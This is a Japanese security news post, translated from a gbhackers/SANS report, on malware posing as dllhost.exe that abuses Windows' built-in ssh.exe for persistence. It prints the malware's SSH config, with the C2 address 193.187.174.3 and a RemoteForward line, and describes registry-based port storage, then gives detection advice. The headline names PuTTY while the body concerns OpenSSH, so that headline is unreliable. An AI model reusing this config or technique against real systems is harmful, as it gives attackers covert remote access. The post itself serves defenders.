Hackers Weaponize Free SSH Client PuTTY to Deliver Malware on Windows
2025/06/02 gbhackers — Linux/Windows システムにおいて、OpenSSH は安全なリモート管理を行うための標準ツールとなっている。その一方で、Windows 10 のバージョン 1803 で、OpenSSH がデフォルト・コンポーネントとして組み込まれて以来、Living Off the Land Binary (LOLBIN) として悪用されるケースも増えている。つまり、攻撃者たちは、信頼できるシステム・ツール ssh.exe を悪用して検出を回避し、永続的なアクセスを確立しようとしている。
最近の、”dllhost.exe” を偽装するマルウェア・サンプルが、この悪用形態を実証している。
SANS のレポートによると、このマルウェアは正規の SSHService プログラムの起動を試み、それに失敗すると、将来の接続のためにランダムに選択されたポートを保存するための、レジストリキー (SOFTWARE\SSHservice) の読取/作成を実施するという。
この戦術は、マルウェアのステルス性を維持するだけではなく、数多くの脅威アクターたちが用いる、一般的な永続化メカニズムである Windows レジストリも活用している。
レジストリ操作と SSH コンフィグ
このマルウェアのワークフローには、いくつかの技術的なステップが含まれる。
レジストリキーの使用:このマルウェアは、SSH サービスで使用されるポート番号を取得するために、レジストリキーを確認する。存在しない場合は、新しいランダム・ポートを生成して保存する。このような設定データに、Windows レジストリを使用することは、様々なマルウェアファミリーにおいて、永続性とステルス性を実現するために広く用いられている手法である。
SSH コンフィグ・ファイルの作成:このマルウェアは、攻撃者の Command and Control (C2) サーバ/ユーザー認証情報/ポートを指定するカスタム SSH コンフィグ・ファイルを “c:\windows\temp\config” に書き込む。このコンフィグ・ファイルには、RemoteForward/StrictHostKeyChecking などのパラメータが取り込まれている。ただし、RemoteForward 行に構文エラーがあるため、このファイルは正当な SSH 使用において無効となる。しかし、その目的はポート転送とリモート・アクセスを可能にすることにある。
プロセス実行:このマルウェアは無限ループに入り、定期的にスリープ状態になり、その後に、悪意のコンフィグ・ファイルを使用して ssh.exe を起動する。それにより、攻撃者のインフラへの接続が継続的に試行される。
このマルウェアにより作成された SSH コンフィグの例:
textHost version
Hostname 193.187.174.3
User ugueegfueuagu17t1424acs
Port 443
ServerAliveInterval 60
ServerAliveCountMax 15
RemoteForward 40909
StrictHostKeyChecking no
SessionType None
注:RemoteForward の正しい構文は次のとおり。
textRemoteForward [bind_address:]port local_address:local_port
提供された設定では、必要なローカルアドレスとポートが指定されていないため、マルウェアの実装に欠陥があります。
ステルス性、永続性、そして検出の課題
この攻撃者は、正規のシステム・バイナリとレジストリキーを利用するため、検出が困難になる。
このマルウェアは、新規プロセスのフォークや標準入出力のリダイレクトといった、OpenSSH のデフォルト動作に依存している。したがって、通常の管理アクティビティを模倣できるため、従来のセキュリティ・ツールでは、悪意のセッションと正規のセッションの区別が困難になる。
さらに、レジストリ・ベースの永続性は十分に裏付けられた戦術であり、数多くの高度な脅威アクターが、レジストリキーを変更/隠蔽することで削除を回避し、アクセスを維持している。
一般的な永続化および検出の回避手法:
| Technique | Description |
|---|---|
| Registry Key Manipulation | Uses trusted binaries (e.g., ssh.exe) to blend malicious actions with normal ones |
| LOLBIN Abuse | Uses trusted binaries (e.g., ssh.exe) to blend malicious actions with normal |
| Custom SSH Config | Enables stealthy C2 communication and port forwarding |
| Process Masquerading | Runs under generic names (e.g., dllhost.exe) to avoid suspicion |
OpenSSH が、デフォルトの Windows インストールに統合されたことで、攻撃者の攻撃対象領域が拡大し、信頼できるシステム・ツールを日常的に悪用し、永続化やステルス・アクセスを行うようになっている。
防御側にとって必要となるのは、異常なレジストリ変更/予期しない SSH コンフィグ・ファイル/ssh.exe に関連する異常なプロセス起動を監視することだ。
このような脅威が、永続的な足場を確立する前に検出するためには、定期的な整合性チェックと動作監視が不可欠となる。
OpenSSH は広く普及しており、柔軟性があるため、管理者と攻撃者の両方にとって強力なツールとなる。シンプルでありながら、効果的な SSH バックドアを防御するためには、継続的な監視と高度な検出戦略が不可欠である。
この記事からは、OpenSSH が便利な管理ツールである一方で、悪意ある目的にも使われるという、セキュリティ上の二面性に納得です。信頼されるシステム・ツール ssh.exe の悪用により、検出を逃れながら永続的なアクセスを確立しようとする手口は怖いですね。レジストリ操作やカスタム設定ファイルの悪用など、日常の運用に紛れる形で行われるため、防御側には継続的な監視が必要です。よろしければ、カテゴリ LOLBIN も、ご参照下さい。
IoT OT Security News 
You must be logged in to post a comment.